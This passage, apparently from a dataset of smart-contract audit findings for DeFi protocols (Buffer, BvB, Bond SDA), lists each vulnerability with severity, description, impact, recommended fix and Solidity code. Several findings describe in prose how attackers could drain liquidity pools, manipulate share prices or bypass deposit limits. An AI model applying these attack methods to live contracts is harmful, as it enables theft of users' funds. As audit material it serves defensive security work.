optionsContract.isStrikeValid(\\n queuedTrade.slippage,\\n price,\\n queuedTrade.expectedStrike\\n );\\n\\n if (!isSlippageWithinRange) {\\n _cancelQueuedTrade(queueId);\\n emit CancelTrade(\\n queuedTrade.user,\\n queueId,\\n ""Slippage limit exceeds""\\n );\\n\\n return;\\n }\\n\\n // rest of code\\n\\n optionParams.totalFee = revisedFee;\\n optionParams.strike = price;\\n optionParams.amount = amount;\\n\\n uint256 optionId = optionsContract.createFromRouter(\\n optionParams,\\n isReferralValid\\n );\\n```\\n\\nInside _openQueuedTrade it checks that the price is within the slippage bounds of the order, cancelling if its not. Otherwise it uses the price to open an option. According to documentation, the same router will be used across a large number of assets/pools, which means the publisher for every asset is the same, given that router only has one publisher variable.\\nExamples:\\nImagine two assets are listed that have close prices, asset A = $0.95 and asset B = $1. An adversary could create an call that expires in 10 minutes on asset B with 5% slippage, then immediately queue it with the price of asset A. $0.95 is within the slippage bounds so it creates the option with a strike price of $0.95. Since the price of asset B is actually $1 the adversary will almost guaranteed make money, stealing funds from the LPs. This can be done back and forth between both pools until pools for both assets are drained.\\nIn a similar scenario, if the price of the assets are very different, the adversary could use this to DOS another user by always calling queue with the wrong asset, causing the order to be cancelled.",Pass the asset address through so the BufferBinaryOptions contract can validate it is being called with the correct asset,Adversary can rug LPs and DOS other users,"```\\n for (uint32 index = 0; index < params.length; index++) {\\n OpenTradeParams memory currentParams = params[index];\\n QueuedTrade memory queuedTrade = queuedTrades[\\n currentParams.queueId\\n ];\\n bool isSignerVerifed = _validateSigner(\\n currentParams.timestamp,\\n currentParams.asset,\\n currentParams.price,\\n currentParams.signature\\n );\\n // Silently fail if the signature doesn't match\\n if (!isSignerVerifed) {\\n emit FailResolve(\\n currentParams.queueId,\\n ""Router: Signature didn't match""\\n );\\n continue;\\n }\\n if (\\n !queuedTrade.isQueued ||\\n currentParams.timestamp != queuedTrade.queuedTime\\n ) {\\n // Trade has already been opened or cancelled or the timestamp is wrong.\\n // So ignore this trade.\\n continue;\\n }\\n\\n // If the opening time is much greater than the queue time then cancel the trad\\n if (block.timestamp - queuedTrade.queuedTime <= MAX_WAIT_TIME) {\\n _openQueuedTrade(currentParams.queueId, currentParams.price);\\n } else {\\n _cancelQueuedTrade(currentParams.queueId);\\n emit CancelTrade(\\n queuedTrade.user,\\n currentParams.queueId,\\n ""Wait time too high""\\n );\\n }\\n\\n // Track the next queueIndex to be processed for user\\n userNextQueueIndexToProcess[queuedTrade.user] =\\n queuedTrade.userQueueIndex +\\n 1;\\n }\\n```\\n" +Early depositors to BufferBinaryPool can manipulate exchange rates to steal funds from later depositors,high,"To calculate the exchange rate for shares in BufferBinaryPool it divides the total supply of shares by the totalTokenXBalance of the vault. The first deposit can mint a very small number of shares then donate tokenX to the vault to grossly manipulate the share price. When later depositor deposit into the vault they will lose value due to precision loss and the adversary will profit.\\n```\\nfunction totalTokenXBalance()\\n public\\n view\\n override\\n returns (uint256 balance)\\n{\\n return tokenX.balanceOf(address(this)) - lockedPremium;\\n}\\n```\\n\\nShare exchange rate is calculated using the total supply of shares and the totalTokenXBalance, which leaves it vulnerable to exchange rate manipulation. As an example, assume tokenX == USDC. An adversary can mint a single share, then donate 1e8 USDC. Minting the first share established a 1:1 ratio but then donating 1e8 changed the ratio to 1:1e8. Now any deposit lower than 1e8 (100 USDC) will suffer from precision loss and the attackers share will benefit from it.",Require a small minimum deposit (i.e. 1e6),Adversary can effectively steal funds from later users through precision loss,```\\nfunction totalTokenXBalance()\\n public\\n view\\n override\\n returns (uint256 balance)\\n{\\n return tokenX.balanceOf(address(this)) - lockedPremium;\\n}\\n```\\n +"When tokenX is an ERC777 token, users can bypass maxLiquidity",medium,"When tokenX is an ERC777 token, users can use callbacks to provide liquidity exceeding maxLiquidity\\nIn BufferBinaryPool._provide, when tokenX is an ERC777 token, the tokensToSend function of account will be called in tokenX.transferFrom before sending tokens. When the user calls provide again in tokensToSend, since BufferBinaryPool has not received tokens at this time, totalTokenXBalance() has not increased, and the following checks can be bypassed, so that users can provide liquidity exceeding maxLiquidity.\\n```\\n require(\\n balance + tokenXAmount <= maxLiquidity,\\n ""Pool has already reached it's max limit""\\n );\\n```\\n","Change to\\n```\\n function _provide(\\n uint256 tokenXAmount,\\n uint256 minMint,\\n address account\\n ) internal returns (uint256 mint) {\\n// Add the line below\\n bool success = tokenX.transferFrom(\\n// Add the line below\\n account,\\n// Add the line below\\n address(this),\\n// Add the line below\\n tokenXAmount\\n// Add the line below\\n );\\n uint256 supply = totalSupply();\\n uint256 balance = totalTokenXBalance();\\n\\n require(\\n balance // Add the line below\\n tokenXAmount <= maxLiquidity,\\n ""Pool has already reached it's max limit""\\n );\\n\\n if (supply > 0 && balance > 0)\\n mint = (tokenXAmount * supply) / (balance);\\n else mint = tokenXAmount * INITIAL_RATE;\\n\\n require(mint >= minMint, ""Pool: Mint limit is too large"");\\n require(mint > 0, ""Pool: Amount is too small"");\\n\\n// Remove the line below\\n bool success = tokenX.transferFrom(\\n// Remove the line below\\n account,\\n// Remove the line below\\n address(this),\\n// Remove the line below\\n tokenXAmount\\n// Remove the line below\\n );\\n```\\n",users can provide liquidity exceeding maxLiquidity.,"```\\n require(\\n balance + tokenXAmount <= maxLiquidity,\\n ""Pool has already reached it's max limit""\\n );\\n```\\n" +Limited support to a specific subset of ERC20 tokens,medium,"Buffer contest states 'any ERC20 supported', therefore it should take into account all the different ways of signalling success and failure. This is not the case, as all ERC20's transfer(), transferFrom(), and approve() functions are either not verified at all or verified for returning true. As a result, depending on the ERC20 token, some transfer errors may result in passing unnoticed, and/or some successfull transfer may be treated as failed.\\nCurrently the only supported ERC20 tokens are the ones that fulfill both the following requirements:\\nalways revert on failure;\\nalways returns boolean true on success.\\nAn example of a very well known token that is not supported is Tether USD (USDT).\\n👋 IMPORTANT This issue is not the same as reporting that ""return value must be verified to be true"" where the checks are missing! Indeed such a simplistic report should be considered invalid as it still does not solve all the problems but rather introduces others. See Vulnerability Details section for rationale.\\nTokens have different ways of signalling success and failure, and this affect mostly transfer(), transferFrom() and approve() in ERC20 tokens. While some tokens revert upon failure, others consistently return boolean flags to indicate success or failure, and many others have mixed behaviours.\\nSee below a snippet of the USDT Token contract compared to the 0x's ZRX Token contract where the USDT Token transfer function does not even return a boolean value, while the ZRX token consistently returns boolean value hence returning false on failure instead of reverting.\\nUSDT Token snippet (no return value) from Etherscan\\n```\\nfunction transferFrom(address _from, address _to, uint _value) public onlyPayloadSize(3 * 32) {\\n var _allowance = allowed[_from][msg.sender];\\n\\n // Check is not needed because sub(_allowance, _value) will already throw if this condition is not met\\n // if (_value > _allowance) throw;\\n\\n uint fee = (_value.mul(basisPointsRate)).div(10000);\\n if (fee > maximumFee) {\\n fee = maximumFee;\\n }\\n if (_allowance < MAX_UINT) {\\n allowed[_from][msg.sender] = _allowance.sub(_value);\\n }\\n uint sendAmount = _value.sub(fee);\\n balances[_from] = balances[_from].sub(_value);\\n balances[_to] = balances[_to].add(sendAmount);\\n if (fee > 0) {\\n balances[owner] = balances[owner].add(fee);\\n Transfer(_from, owner, fee);\\n }\\n Transfer(_from, _to, sendAmount);\\n}\\n```\\n\\nZRX Token snippet (consistently true or false boolean result) from Etherscan\\n```\\nfunction transferFrom(address _from, address _to, uint _value) returns (bool) {\\n if (balances[_from] >= _value && allowed[_from][msg.sender] >= _value && balances[_to] + _value >= balances[_to]) {\\n balances[_to] += _value;\\n balances[_from] -= _value;\\n allowed[_from][msg.sender] -= _value;\\n Transfer(_from, _to, _value);\\n return true;\\n } else { return false; }\\n}\\n```\\n","To handle most of these inconsistent behaviors across multiple tokens, either use OpenZeppelin's SafeERC20 library, or use a more reusable implementation (i.e. library) of the following intentionally explicit, descriptive example code for an ERC20 transferFrom() call that takes into account all the different ways of signalling success and failure, and apply to all ERC20 transfer(), transferFrom(), approve() calls in the Buffer contracts.\\n```\\nIERC20 token = whatever_token;\\n\\n(bool success, bytes memory returndata) = address(token).call(abi.encodeWithSelector(IERC20.transferFrom.selector, sender, recipient, amount));\\n\\n// if success == false, without any doubts there was an error and callee reverted\\nrequire(success, ""Transfer failed!"");\\n\\n// if success == true, we need to check whether we got a return value or not (like in the case of USDT)\\nif (returndata.length > 0) {\\n // we got a return value, it must be a boolean and it should be true\\n require(abi.decode(returndata, (bool)), ""Transfer failed!"");\\n} else {\\n // since we got no return value it can be one of two cases:\\n // 1. the transferFrom does not return a boolean and it did succeed\\n // 2. the token address is not a contract address therefore call() always return success = true as per EVM design\\n // To discriminate between 1 and 2, we need to check if the address actually points to a contract\\n require(address(token).code.length > 0, ""Not a token address!"");\\n}\\n```\\n","Given the different usages of token transfers in BufferBinaryOptions.sol, BufferBinaryPool.sol, and BufferRouter.sol, there can be 2 types of impacts depending on the ERC20 contract being traded.\\nThe ERC20 token being traded is one that consistently returns a boolean result in the case of success and failure like for example 0x's ZRX Token contract. Where the return value is currently not verified to be true (i.e.: #1, #2, #3, #4, #5, #6) the transfer may fail (e.g.: no tokens transferred due to insufficient balance) but the error would not be detected by the Buffer contracts.\\nThe ERC20 token being traded is one that do not return a boolean value like for example the well knonw Tether USD Token contract. Successful transfers would cause a revert in the Buffer contracts where the return value is verified to be true (i.e.: #1, #2, #3, #4) due to the token not returing boolean results.\\nSame is true for appove calls.","```\\nfunction transferFrom(address _from, address _to, uint _value) public onlyPayloadSize(3 * 32) {\\n var _allowance = allowed[_from][msg.sender];\\n\\n // Check is not needed because sub(_allowance, _value) will already throw if this condition is not met\\n // if (_value > _allowance) throw;\\n\\n uint fee = (_value.mul(basisPointsRate)).div(10000);\\n if (fee > maximumFee) {\\n fee = maximumFee;\\n }\\n if (_allowance < MAX_UINT) {\\n allowed[_from][msg.sender] = _allowance.sub(_value);\\n }\\n uint sendAmount = _value.sub(fee);\\n balances[_from] = balances[_from].sub(_value);\\n balances[_to] = balances[_to].add(sendAmount);\\n if (fee > 0) {\\n balances[owner] = balances[owner].add(fee);\\n Transfer(_from, owner, fee);\\n }\\n Transfer(_from, _to, sendAmount);\\n}\\n```\\n" +The `_fee()` function is wrongly implemented in the code,medium,"_fee() function is wrongly implemented in the code so the protocol will get fewer fees and the trader will earn more\\n```\\n (uint256 unitFee, , ) = _fees(10**decimals(), settlementFeePercentage);\\n amount = (newFee * 10**decimals()) / unitFee;\\n```\\n\\nlet's say we have: `newFee` 100 USDC USDC Decimals is 6 `settlementFeePercentage` is 20% ==> 200\\nThe `unitFee` will be 520_000\\n`amount` = (100 * 1_000_000) / 520_000 `amount` = 192 USDC Which is supposed to be `amount` = 160 USDC",The `_fee()` function needs to calculate the fees in this way\\n```\\ntotal_fee = (5000 * amount)/ (10000 - sf)\\n```\\n,The protocol will earn fees less than expected,"```\\n (uint256 unitFee, , ) = _fees(10**decimals(), settlementFeePercentage);\\n amount = (newFee * 10**decimals()) / unitFee;\\n```\\n" +Bulls that are unable to receive NFTs will not be able to claim them later,medium,"A lot of care has been taken to ensure that, if a bull has a contract address that doesn't accept ERC721s, the NFT is saved to `withdrawableCollectionTokenId` for later withdrawal. However, because there is no way to withdraw this token to a different address (and the original address doesn't accept NFTs), it will never be able to be claimed.\\nTo settle a contract, the bear calls `settleContract()`, which sends their NFT to the bull, and withdraws the collateral and premium to the bear.\\n```\\ntry IERC721(order.collection).safeTransferFrom(bear, bull, tokenId) {}\\ncatch (bytes memory) {\\n // Transfer NFT to BvbProtocol\\n IERC721(order.collection).safeTransferFrom(bear, address(this), tokenId);\\n // Store that the bull has to retrieve it\\n withdrawableCollectionTokenId[order.collection][tokenId] = bull;\\n}\\n\\nuint bearAssetAmount = order.premium + order.collateral;\\nif (bearAssetAmount > 0) {\\n // Transfer payment tokens to the Bear\\n IERC20(order.asset).safeTransfer(bear, bearAssetAmount);\\n}\\n```\\n\\nIn order to address the case that the bull is a contract that can't accept NFTs, the protocol uses a try-catch setup. If the transfer doesn't succeed, it transfers the NFT into the contract, and sets `withdrawableCollectionTokenId` so that the specific NFT is attributed to the bull for later withdrawal.\\nHowever, assuming the bull isn't an upgradeable contract, this withdrawal will never be possible, because their only option is to call the same function `safeTransferFrom` to the same contract address, which will fail in the same way.\\n```\\nfunction withdrawToken(bytes32 orderHash, uint tokenId) public {\\n address collection = matchedOrders[uint(orderHash)].collection;\\n\\n address recipient = withdrawableCollectionTokenId[collection][tokenId];\\n\\n // Transfer NFT to recipient\\n IERC721(collection).safeTransferFrom(address(this), recipient, tokenId);\\n\\n // This token is not withdrawable anymore\\n withdrawableCollectionTokenId[collection][tokenId] = address(0);\\n\\n emit WithdrawnToken(orderHash, tokenId, recipient);\\n}\\n```\\n","There are a few possible solutions:\\nAdd a `to` field in the `withdrawToken` function, which allows the bull `to` withdraw the NFT `to` another address\\nCreate a function similar `to` `transferPosition` that can be used `to` transfer owners of a withdrawable NFT\\nDecide that you want `to` punish bulls who aren't able `to` receive NFTs, in which case there is no need `to` save their address or implement a `withdrawToken` function","If a bull is a contract that can't receive NFTs, their orders will be matched, the bear will be able to withdraw their assets, but the bull's NFT will remain stuck in the BVB protocol contract.","```\\ntry IERC721(order.collection).safeTransferFrom(bear, bull, tokenId) {}\\ncatch (bytes memory) {\\n // Transfer NFT to BvbProtocol\\n IERC721(order.collection).safeTransferFrom(bear, address(this), tokenId);\\n // Store that the bull has to retrieve it\\n withdrawableCollectionTokenId[order.collection][tokenId] = bull;\\n}\\n\\nuint bearAssetAmount = order.premium + order.collateral;\\nif (bearAssetAmount > 0) {\\n // Transfer payment tokens to the Bear\\n IERC20(order.asset).safeTransfer(bear, bearAssetAmount);\\n}\\n```\\n" +Attackers can use `reclaimContract()` to transfer assets in protocol to address(0),high,"`reclaimContract()` would transfer payment tokens to `bulls[contractId]`. An attacker can make `reclaimContract()` transfer assets to address(0).\\nAn attacker can use a fake order to trick `reclaimContract()`. The fake order needs to meet the following requirements:\\n`block.timestamp > order.expiry`.\\n`!settledContracts[contractId]`.\\n`!reclaimedContracts[contractId],`.\\nThe first one is easy to fulfilled, an attacker can decide the content of the fake order. And the others are all satisfied since the fake order couldn't be settled or reclaimed before.\\n```\\n function reclaimContract(Order calldata order) public nonReentrant {\\n bytes32 orderHash = hashOrder(order);\\n\\n // ContractId\\n uint contractId = uint(orderHash);\\n\\n address bull = bulls[contractId];\\n\\n // Check that the contract is expired\\n require(block.timestamp > order.expiry, ""NOT_EXPIRED_CONTRACT"");\\n\\n // Check that the contract is not settled\\n require(!settledContracts[contractId], ""SETTLED_CONTRACT"");\\n\\n // Check that the contract is not reclaimed\\n require(!reclaimedContracts[contractId], ""RECLAIMED_CONTRACT"");\\n\\n uint bullAssetAmount = order.premium + order.collateral;\\n if (bullAssetAmount > 0) {\\n // Transfer payment tokens to the Bull\\n IERC20(order.asset).safeTransfer(bull, bullAssetAmount);\\n }\\n\\n reclaimedContracts[contractId] = true;\\n\\n emit ReclaimedContract(orderHash, order);\\n }\\n```\\n",There are multiple solutions for this problem.\\ncheck `bulls[contractId] != address(0)`\\ncheck the order is matched `matchedOrders[contractId].maker != address(0)`,An attacker can use this vulnerability to transfer assets from BvB to address(0). It results in serious loss of funds.,"```\\n function reclaimContract(Order calldata order) public nonReentrant {\\n bytes32 orderHash = hashOrder(order);\\n\\n // ContractId\\n uint contractId = uint(orderHash);\\n\\n address bull = bulls[contractId];\\n\\n // Check that the contract is expired\\n require(block.timestamp > order.expiry, ""NOT_EXPIRED_CONTRACT"");\\n\\n // Check that the contract is not settled\\n require(!settledContracts[contractId], ""SETTLED_CONTRACT"");\\n\\n // Check that the contract is not reclaimed\\n require(!reclaimedContracts[contractId], ""RECLAIMED_CONTRACT"");\\n\\n uint bullAssetAmount = order.premium + order.collateral;\\n if (bullAssetAmount > 0) {\\n // Transfer payment tokens to the Bull\\n IERC20(order.asset).safeTransfer(bull, bullAssetAmount);\\n }\\n\\n reclaimedContracts[contractId] = true;\\n\\n emit ReclaimedContract(orderHash, order);\\n }\\n```\\n" +Transferring Ownership Might Break The Market,medium,"After the transfer of the market ownership, the market might stop working, and no one could purchase any bond token from the market leading to a loss of sale for the market makers.\\nThe `callbackAuthorized` mapping contains a list of whitelisted market owners authorized to use the callback. When the users call the `purchaseBond` function, it will check at Line 390 if the current market owner is still authorized to use a callback. Otherwise, the function will revert.\\n```\\nFile: BondBaseSDA.sol\\n function purchaseBond(\\n uint256 id_,\\n uint256 amount_,\\n uint256 minAmountOut_\\n ) external override returns (uint256 payout) {\\n if (msg.sender != address(_teller)) revert Auctioneer_NotAuthorized();\\n\\n BondMarket storage market = markets[id_];\\n BondTerms memory term = terms[id_];\\n\\n // If market uses a callback, check that owner is still callback authorized\\n if (market.callbackAddr != address(0) && !callbackAuthorized[market.owner])\\n revert Auctioneer_NotAuthorized();\\n```\\n\\nHowever, if the market owner transfers the market ownership to someone else. The market will stop working because the new market owner might not be on the list of whitelisted market owners (callbackAuthorized mapping). As such, no one can purchase any bond token.\\n```\\nFile: BondBaseSDA.sol\\n function pushOwnership(uint256 id_, address newOwner_) external override {\\n if (msg.sender != markets[id_].owner) revert Auctioneer_OnlyMarketOwner();\\n newOwners[id_] = newOwner_;\\n }\\n```\\n","Before pushing the ownership, if the market uses a callback, implement an additional validation check to ensure that the new market owner has been whitelisted to use the callback. This will ensure that transferring the market ownership will not break the market due to the new market owner not being whitelisted.\\n```\\nfunction pushOwnership(uint256 id_, address newOwner_) external override {\\n if (msg.sender != markets[id_].owner) revert Auctioneer_OnlyMarketOwner();\\n// Add the line below\\n if (markets[id_].callbackAddr != address(0) && !callbackAuthorized[newOwner_])\\n// Add the line below\\n revert newOwnerNotAuthorizedToUseCallback();\\n newOwners[id_] = newOwner_;\\n}\\n```\\n","After the transfer of the market ownership, the market might stop working, and no one could purchase any bond token from the market leading to a loss of sale for the market makers.","```\\nFile: BondBaseSDA.sol\\n function purchaseBond(\\n uint256 id_,\\n uint256 amount_,\\n uint256 minAmountOut_\\n ) external override returns (uint256 payout) {\\n if (msg.sender != address(_teller)) revert Auctioneer_NotAuthorized();\\n\\n BondMarket storage market = markets[id_];\\n BondTerms memory term = terms[id_];\\n\\n // If market uses a callback, check that owner is still callback authorized\\n if (market.callbackAddr != address(0) && !callbackAuthorized[market.owner])\\n revert Auctioneer_NotAuthorized();\\n```\\n" +Market Price Lower Than Expected,medium,"The market price does not conform to the specification documented within the whitepaper. As a result, the computed market price is lower than expected.\\nThe following definition of the market price is taken from the whitepaper. Taken from Page 13 of the whitepaper - Definition 25\\n\\nThe integer implementation of the market price must be rounded up per the whitepaper. This ensures that the integer implementation of the market price is greater than or equal to the real value of the market price so as to protect makers from selling tokens at a lower price than expected.\\nWithin the `BondBaseSDA.marketPrice` function, the computation of the market price is rounded up in Line 688, which conforms to the specification.\\n```\\nFile: BondBaseSDA.sol\\n function marketPrice(uint256 id_) public view override returns (uint256) {\\n uint256 price = currentControlVariable(id_).mulDivUp(currentDebt(id_), markets[id_].scale);\\n\\n return (price > markets[id_].minPrice) ? price : markets[id_].minPrice;\\n }\\n```\\n\\nHowever, within the `BondBaseSDA._currentMarketPrice` function, the market price is rounded down, resulting in the makers selling tokens at a lower price than expected.\\n```\\nFile: BondBaseSDA.sol\\n function _currentMarketPrice(uint256 id_) internal view returns (uint256) {\\n BondMarket memory market = markets[id_];\\n return terms[id_].controlVariable.mulDiv(market.totalDebt, market.scale);\\n }\\n```\\n","Ensure the market price is rounded up so that the desired property can be achieved and the makers will not be selling tokens at a lower price than expected.\\n```\\nfunction _currentMarketPrice(uint256 id_) internal view returns (uint256) {\\n BondMarket memory market = markets[id_];\\n// Remove the line below\\n return terms[id_].controlVariable.mulDiv(market.totalDebt, market.scale);\\n// Add the line below\\n return terms[id_].controlVariable.mulDivUp(market.totalDebt, market.scale);\\n}\\n```\\n","Loss for the makers as their tokens are sold at a lower price than expected.\\nAdditionally, the affected `BondBaseSDA._currentMarketPrice` function is used within the `BondBaseSDA._decayAndGetPrice` function to derive the market price. Since a lower market price will be returned, this will lead to a higher amount of payout tokens. Subsequently, the `lastDecayIncrement` will be higher than expected, which will lead to a lower `totalDebt`. Lower debt means a lower market price will be computed later.","```\\nFile: BondBaseSDA.sol\\n function marketPrice(uint256 id_) public view override returns (uint256) {\\n uint256 price = currentControlVariable(id_).mulDivUp(currentDebt(id_), markets[id_].scale);\\n\\n return (price > markets[id_].minPrice) ? price : markets[id_].minPrice;\\n }\\n```\\n" +Teller Cannot Be Removed From Callback Contract,medium,"If a vulnerable Teller is being exploited by an attacker, there is no way for the owner of the Callback Contract to remove the vulnerable Teller from their Callback Contract.\\nThe Callback Contract is missing the feature to remove a Teller. Once a Teller has been added to the whitelist (approvedMarkets mapping), it is not possible to remove the Teller from the whitelist.\\n```\\nFile: BondBaseCallback.sol\\n /* ========== WHITELISTING ========== */\\n\\n /// @inheritdoc IBondCallback\\n function whitelist(address teller_, uint256 id_) external override onlyOwner {\\n // Check that the market id is a valid, live market on the aggregator\\n try _aggregator.isLive(id_) returns (bool live) {\\n if (!live) revert Callback_MarketNotSupported(id_);\\n } catch {\\n revert Callback_MarketNotSupported(id_);\\n }\\n\\n // Check that the provided teller is the teller for the market ID on the stored aggregator\\n // We could pull the teller from the aggregator, but requiring the teller to be passed in\\n // is more explicit about which contract is being whitelisted\\n if (teller_ != address(_aggregator.getTeller(id_))) revert Callback_TellerMismatch();\\n\\n approvedMarkets[teller_][id_] = true;\\n }\\n```\\n","Consider implementing an additional function to allow the removal of a Teller from the whitelist (approvedMarkets mapping), so that a vulnerable Teller can be removed swiftly if needed.\\n```\\nfunction removeFromWhitelist(address teller_, uint256 id_) external override onlyOwner {\\n approvedMarkets[teller_][id_] = false;\\n}\\n```\\n\\nNote: Although the owner of the Callback Contract can DOS its own market by abusing the `removeFromWhitelist` function, no sensible owner would do so.","In the event that a whitelisted Teller is found to be vulnerable and has been actively exploited by an attacker in the wild, the owner of the Callback Contract needs to mitigate the issue swiftly by removing the vulnerable Teller from the Callback Contract to stop it from draining the asset within the Callback Contract. However, the mitigation effort will be hindered by the fact there is no way to remove a Teller within the Callback Contract once it has been whitelisted. Thus, it might not be possible to stop the attacker from exploiting the vulnerable Teller to drain assets within the Callback Contract. The Callback Contract owners would need to find a workaround to block the attack, which will introduce an unnecessary delay to the recovery process where every second counts.\\nAdditionally, if the owner accidentally whitelisted the wrong Teller, there is no way to remove it.","```\\nFile: BondBaseCallback.sol\\n /* ========== WHITELISTING ========== */\\n\\n /// @inheritdoc IBondCallback\\n function whitelist(address teller_, uint256 id_) external override onlyOwner {\\n // Check that the market id is a valid, live market on the aggregator\\n try _aggregator.isLive(id_) returns (bool live) {\\n if (!live) revert Callback_MarketNotSupported(id_);\\n } catch {\\n revert Callback_MarketNotSupported(id_);\\n }\\n\\n // Check that the provided teller is the teller for the market ID on the stored aggregator\\n // We could pull the teller from the aggregator, but requiring the teller to be passed in\\n // is more explicit about which contract is being whitelisted\\n if (teller_ != address(_aggregator.getTeller(id_))) revert Callback_TellerMismatch();\\n\\n approvedMarkets[teller_][id_] = true;\\n }\\n```\\n" +`BondAggregator.findMarketFor` Function Will Break In Certain Conditions,medium,"`BondAggregator.findMarketFor` function will break when the `BondBaseSDA.payoutFor` function within the for-loop reverts under certain conditions.\\nThe `BondBaseSDA.payoutFor` function will revert if the computed payout is larger than the market's max payout. Refer to Line 711 below.\\n```\\nFile: BondBaseSDA.sol\\n function payoutFor(\\n uint256 amount_,\\n uint256 id_,\\n address referrer_\\n ) public view override returns (uint256) {\\n // Calculate the payout for the given amount of tokens\\n uint256 fee = amount_.mulDiv(_teller.getFee(referrer_), 1e5);\\n uint256 payout = (amount_ - fee).mulDiv(markets[id_].scale, marketPrice(id_));\\n\\n // Check that the payout is less than or equal to the maximum payout,\\n // Revert if not, otherwise return the payout\\n if (payout > markets[id_].maxPayout) {\\n revert Auctioneer_MaxPayoutExceeded();\\n } else {\\n return payout;\\n }\\n }\\n```\\n\\nThe `BondAggregator.findMarketFor` function will call the `BondBaseSDA.payoutFor` function at Line 245. The `BondBaseSDA.payoutFor` function will revert if the final computed payout is larger than the `markets[id_].maxPayout` as mentioned earlier. This will cause the entire for-loop to ""break"" and the transaction to revert.\\nAssume that the user configures the `minAmountOut_` to be `0`, then the condition `minAmountOut_ <= maxPayout` Line 244 will always be true. The `amountIn_` will always be passed to the `payoutFor` function. In some markets where the computed payout is larger than the market's max payout, the `BondAggregator.findMarketFor` function will revert.\\n```\\nFile: BondAggregator.sol\\n /// @inheritdoc IBondAggregator\\n function findMarketFor(\\n address payout_,\\n address quote_,\\n uint256 amountIn_,\\n uint256 minAmountOut_,\\n uint256 maxExpiry_\\n ) external view returns (uint256) {\\n uint256[] memory ids = marketsFor(payout_, quote_);\\n uint256 len = ids.length;\\n uint256[] memory payouts = new uint256[](len);\\n\\n uint256 highestOut;\\n uint256 id = type(uint256).max; // set to max so an empty set doesn't return 0, the first index\\n uint48 vesting;\\n uint256 maxPayout;\\n IBondAuctioneer auctioneer;\\n for (uint256 i; i < len; ++i) {\\n auctioneer = marketsToAuctioneers[ids[i]];\\n (, , , , vesting, maxPayout) = auctioneer.getMarketInfoForPurchase(ids[i]);\\n\\n uint256 expiry = (vesting <= MAX_FIXED_TERM) ? block.timestamp + vesting : vesting;\\n\\n if (expiry <= maxExpiry_) {\\n payouts[i] = minAmountOut_ <= maxPayout\\n ? payoutFor(amountIn_, ids[i], address(0))\\n : 0;\\n\\n if (payouts[i] > highestOut) {\\n highestOut = payouts[i];\\n id = ids[i];\\n }\\n }\\n }\\n\\n return id;\\n }\\n```\\n",Consider using try-catch or address.call to handle the revert of the `BondBaseSDA.payoutFor` function within the for-loop gracefully. This ensures that a single revert of the `BondBaseSDA.payoutFor` function will not affect the entire for-loop within the `BondAggregator.findMarketFor` function.,"The find market feature within the protocol is broken under certain conditions. As such, users would not be able to obtain the list of markets that meet their requirements. The market makers affected by this issue will lose the opportunity to sell their bond tokens.","```\\nFile: BondBaseSDA.sol\\n function payoutFor(\\n uint256 amount_,\\n uint256 id_,\\n address referrer_\\n ) public view override returns (uint256) {\\n // Calculate the payout for the given amount of tokens\\n uint256 fee = amount_.mulDiv(_teller.getFee(referrer_), 1e5);\\n uint256 payout = (amount_ - fee).mulDiv(markets[id_].scale, marketPrice(id_));\\n\\n // Check that the payout is less than or equal to the maximum payout,\\n // Revert if not, otherwise return the payout\\n if (payout > markets[id_].maxPayout) {\\n revert Auctioneer_MaxPayoutExceeded();\\n } else {\\n return payout;\\n }\\n }\\n```\\n" +Debt Decay Faster Than Expected,medium,"The debt decay at a rate faster than expected, causing market makers to sell bond tokens at a lower price than expected.\\nThe following definition of the debt decay reference time following any purchases at time `t` taken from the whitepaper. The second variable, which is the delay increment, is rounded up. Following is taken from Page 15 of the whitepaper - Definition 27\\n\\nHowever, the actual implementation in the codebase differs from the specification. At Line 514, the delay increment is rounded down instead.\\n```\\nFile: BondBaseSDA.sol\\n // Set last decay timestamp based on size of purchase to linearize decay\\n uint256 lastDecayIncrement = debtDecayInterval.mulDiv(payout_, lastTuneDebt);\\n metadata[id_].lastDecay += uint48(lastDecayIncrement);\\n```\\n","When computing the `lastDecayIncrement`, the result should be rounded up.\\n```\\n// Set last decay timestamp based on size of purchase to linearize decay\\n// Remove the line below\\n uint256 lastDecayIncrement = debtDecayInterval.mulDiv(payout_, lastTuneDebt);\\n// Add the line below\\n uint256 lastDecayIncrement = debtDecayInterval.mulDivUp(payout_, lastTuneDebt);\\nmetadata[id_].lastDecay // Add the line below\\n= uint48(lastDecayIncrement);\\n```\\n","When the delay increment (TD) is rounded down, the debt decay reference time increment will be smaller than expected. The debt component will then decay at a faster rate. As a result, the market price will not be adjusted in an optimized manner, and the market price will fall faster than expected, causing market makers to sell bond tokens at a lower price than expected.\\nFollowing is taken from Page 8 of the whitepaper - Definition 8\\n","```\\nFile: BondBaseSDA.sol\\n // Set last decay timestamp based on size of purchase to linearize decay\\n uint256 lastDecayIncrement = debtDecayInterval.mulDiv(payout_, lastTuneDebt);\\n metadata[id_].lastDecay += uint48(lastDecayIncrement);\\n```\\n" +Fixed Term Bond tokens can be minted with non-rounded expiry,medium,"Fixed Term Tellers intend to mint tokens that expire once per day, to consolidate liquidity and create a uniform experience. However, this rounding is not enforced on the external `deploy()` function, which allows for tokens expiring at unexpected times.\\nIn `BondFixedTermTeller.sol`, new tokenIds are deployed through the `_handlePayout()` function. The function calculates the expiry (rounded down to the nearest day), uses this expiry to create a tokenId, and — if that tokenId doesn't yet exist — deploys it.\\n```\\n// rest of code\\nexpiry = ((vesting_ + uint48(block.timestamp)) / uint48(1 days)) * uint48(1 days);\\n\\n// Fixed-term user payout information is handled in BondTeller.\\n// Teller mints ERC-1155 bond tokens for user.\\nuint256 tokenId = getTokenId(payoutToken_, expiry);\\n\\n// Create new bond token if it doesn't exist yet\\nif (!tokenMetadata[tokenId].active) {\\n _deploy(tokenId, payoutToken_, expiry);\\n}\\n// rest of code\\n```\\n\\nThis successfully consolidates all liquidity into one daily tokenId, which expires (as expected) at the time included in the tokenId.\\nHowever, if the `deploy()` function is called directly, no such rounding occurs:\\n```\\nfunction deploy(ERC20 underlying_, uint48 expiry_)\\n external\\n override\\n nonReentrant\\n returns (uint256)\\n{\\n uint256 tokenId = getTokenId(underlying_, expiry_);\\n // Only creates token if it does not exist\\n if (!tokenMetadata[tokenId].active) {\\n _deploy(tokenId, underlying_, expiry_);\\n }\\n return tokenId;\\n}\\n```\\n\\nThis creates a mismatch between the tokenId time and the real expiry time, as tokenId is calculated by rounding the expiry down to the nearest day:\\n```\\nuint256 tokenId = uint256(\\n keccak256(abi.encodePacked(underlying_, expiry_ / uint48(1 days)))\\n);\\n```\\n\\n... while the `_deploy()` function saves the original 